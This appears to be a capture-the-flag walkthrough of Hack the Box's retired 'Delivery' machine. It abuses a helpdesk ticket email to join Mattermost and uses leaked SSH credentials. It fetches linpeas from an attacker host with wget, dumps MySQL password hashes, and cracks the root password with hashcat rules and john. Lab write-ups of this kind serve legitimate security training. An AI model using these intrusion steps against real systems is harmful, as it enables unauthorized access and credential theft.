Hello! Everyone and Welcome to yet another CTF challenge from Hack the Box, called ‘Delivery,’ which is available online for those who want to increase their skills in penetration testing and Black box testing. Delivery is a retired vulnerable lab presented by Hack the Box for making online penetration testing practice suitable to your experience level; they have a large collection of vulnerable labs as challenges ranging from beginner to expert level.
Task: Find user.txt and root.txt in the victim’s machine
- Using /etc/hosts for custom domain
- Browsing HTTP service
- Enumerating email service
- Extracting database credentials from mattermost
- Cracking Password using hashcat rule based attack
- Privilege Escalation
- Cracking the password using john the ripper
- Capturing the flag
Let’s get started then!
To Attack any machine, we need the IP Address. Machine hosted on HackTheBox have a static IP Address.
IP Address assigned to the delivery machine: 10.129.149.209
Let us scan the VM with the most popular port scanning tool, nmap to enumerate open ports on the machine
So we add
10.129.149.209 to /etc/hosts delivery.htb
nmap -p- -A delivery.htb
From the result below we found three working ports on the VM, port SSH(22), HTTP(80) and Unknown(8065).
Since HTTP service runs on port 80, from nmap results. So, we browse the IP address of Target in the browser. We found a simple HTML page.
By scrolling and clicking on the contact us page we found a link which goes to http://delivery.htb:8805 and we also got a hint on the page that to access mattermost server we need @delivery.htb email address.
Since we have added the host, we can now see the website in the browser by visiting http://delivery.htb.
We clicked on helpdesk and found another link which is a subdomain for helpdesk. So, we add and update the host file /etc/hosts with helpdesk.delivery.htb
nano /etc/hosts 10.129.149.79 delivery.htb helpdesk.delivery.htb
Since we have added the subdomain, we do further enumeration by visiting the subdomain http://helpdesk.delivery.htb. Which is running a support ticket system web application powered by osticket.
According to the hint we got before on the contact us page, a valid email should end with @delivery.htb domain to access the mattermost server. So, we try to open a ticket as a guest user.
So, it gave us a successful message that our ticket is created as a guest user and it also provided us with an email ([email protected]) on which replying directly will further update the ticket on the customer portal.
So, let’s leverage this feature to gain access to mattermost service.
Based on the hint we got earlier, we need @delivery.htb email to access the mattermost server. So, let’s try to enumerate the mattermost which is running on port 8065. Here we could see an option to create an account.
So, let’s sign up using the email from the support ticket, ([email protected]) which we received when we opened a new ticket.
So, to get the confirmation email we need to access the customer support portal, Let’s go back and use the check ticket option on helpdesk using the ticket id and email [email protected] to get the ticket data we opened.
Here we can see a confirmation email from mattermost server.
We copy and paste into the browser to activate the email and access mattermost server. Once verified we login and see if we can find something interesting here.
On logging in there is a chance to join the internal team, Once joined there is some chat with the root user which has mentioned some SSH credentials in the chat.
There is also a message which says to stop “using common password variations because of how easily it can be exploited”. So, let’s first login to server to ssh with credentials.
Username: maildeliverer Password: Youve_G0t_Mail! ssh [email protected]
Once connected we can see the user.txt flag but we are first focused on getting root flag so, we immediately ran linpeas to find out some weaknesses in the server.
cd /tmp wget 10.10.14.108:8080/linpeas.sh chmod 777 linpeas.sh
Since user maildeliverer is a basic user with no sudo privileges, However, there is MySQL database running because ticketing system is storing ticket details and while looking at the files we found mattermost service having writeable access and stores its configurations in path /opt/mattermost/ config/config.json.
So, after opening the config.json file we found database credentials under SqlSettings.
cd /opt ls cd mattermost ls cd config cat config.json
The database credentials are:
Username: mmuser Password: Crack_The_MM_Admin_PW
We connect to the database with the credentials we have found in mattermost config.json using the command below.
mysql -h 127.0.0.1 -u'mmuser' -p
We check all the database available and here we only found default and mattermost database so we use mattermost database and check tables.
show database; use mattermost; show tables;
Since we found many tables, but we will go with user table which looks interesting so let’s check if we can find some root credentials.
select Username, password from Users;
As we should only be interested in root user but the problem here is that the password is in the hash. Save the password in a file called hash.
Previously a hint was given in chat by the root user that the password should be a variant of PleaseSubscribe! So, we created a custom wordlist instead on using rockyou.txt
We saved PleaseSubscribe! in a file, then created a custom variant using hashcat, there are many in /usr/share/hashcat/rules, so let’s start with the one called “best”.
nano file cat file hashcat -r /usr/share/hashcat/rules/best64.rule --stdout file > dict.txt
Once our dictionary is created, we can use it to crack the hash with john the ripper.
john --wordlist=/root/dict.txt hash
su root PleaseSubscribe!21 cd /root cat root.txt
Author: Prabhjot Dunglay is a Cyber Security Enthusiast with 2 years of experience in Penetration Testing at Hacking Articles, Ignite technologies. Contact here.
Source: Hacking Articles